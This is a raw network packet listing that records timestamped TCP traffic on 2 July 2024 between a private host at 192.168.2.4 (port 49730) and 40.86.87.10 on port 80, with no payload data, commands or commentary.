Jul 2, 2024 07:31:03.531105995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531115055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531124115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531131983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531133890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531141996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531151056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531152010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531161070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531172037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531177998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531181097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531191111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531192064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531200886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.531218052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531225920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.531249046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532444954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532455921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532465935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532474995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532494068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532495022 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532505989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532516003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532516956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532526016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532536030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532547951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532548904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532557964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532566071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532567024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532577038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532588005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532604933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532630920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532938004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532948017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532958031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532967091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532975912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532980919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.532987118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532996893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.532999039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.533005953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.533016920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.533036947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.533066034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.616630077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.616694927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.616794109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.616853952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.648664951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648721933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.648725033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648736954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648770094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.648894072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648905039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648917913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.648932934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.648952007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.648967028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649100065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649111032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649121046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649132013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649142027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649154902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649185896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649357080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649374008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649384975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649394989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649405956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649406910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649430037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649454117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649682045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649693012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649739027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649816990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649828911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649840117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649857998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649868965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649873972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649879932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649890900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649902105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.649904966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649919033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.649944067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.650465012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650475979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650486946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650497913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650507927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650513887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.650520086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650531054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650541067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650552034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650561094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650567055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650576115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.650578976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650589943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650600910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.650602102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.650619984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.650648117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651422977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651432037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651443005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651453972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651464939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651468039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651474953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651483059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651485920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651496887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651510000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651520014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651523113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651530981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651541948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651542902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651552916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651565075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651565075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651575089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651585102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.651588917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.651632071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652389050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652400970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652412891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652425051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652436018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652437925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652446032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652456999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652472973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652478933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652493000 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652498007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652508974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652520895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652523041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652532101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652543068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652549028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652554989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.652570963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652585030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.652616024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653279066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653291941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653306961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653317928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653327942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653337002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653342962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653352022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653363943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653374910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653379917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653386116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653393030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653397083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653408051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653418064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653426886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653429985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653440952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.653459072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.653472900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654148102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654161930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654211044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654221058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654320002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654331923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654341936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654347897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654360056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654371023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654381037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654385090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654392004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654402018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654408932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654412985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654426098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654436111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654443026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654448032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.654464960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.654489040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.655247927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655260086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655271053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655282974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655292988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655296087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.655307055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655317068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.655317068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655328035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655339003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655349970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.655349970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655361891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.655379057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.655395031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.740626097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.740673065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.740678072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.740684986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.740715981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.740726948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.740766048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.740822077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.771606922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771619081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771632910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771667004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771696091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.771740913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771740913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.771753073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771763086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771775007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.771785975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.771816969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.771994114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772005081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772023916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772036076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772047043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772054911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772066116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772066116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772102118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772129059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772404909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772418976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772433996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772444963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772456884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772464991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772468090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772499084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772524118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772777081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772793055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772804022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.772841930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.772861004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773037910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773050070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773058891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773070097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773086071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773092985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773097038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773109913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773124933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773124933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773137093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773150921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773152113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773164988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773170948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773200989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773228884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773742914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773753881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773763895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773772955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773783922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773794889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773794889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773806095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773819923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773832083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773833036 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773843050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.773858070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.773881912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.774357080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774368048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774378061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774388075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774401903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774411917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.774411917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774422884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774432898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774434090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.774446011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774456024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.774456024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774467945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.774477959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.774513006 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775055885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775070906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775080919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775091887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775103092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775110960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775115013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775125980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775135040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775141954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775149107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775151968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775162935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775177956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775202036 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775213003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775762081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775773048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775783062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775794029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775804996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775815964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775815964 CEST	49730	80	192.168.2.4	40.86.87.10
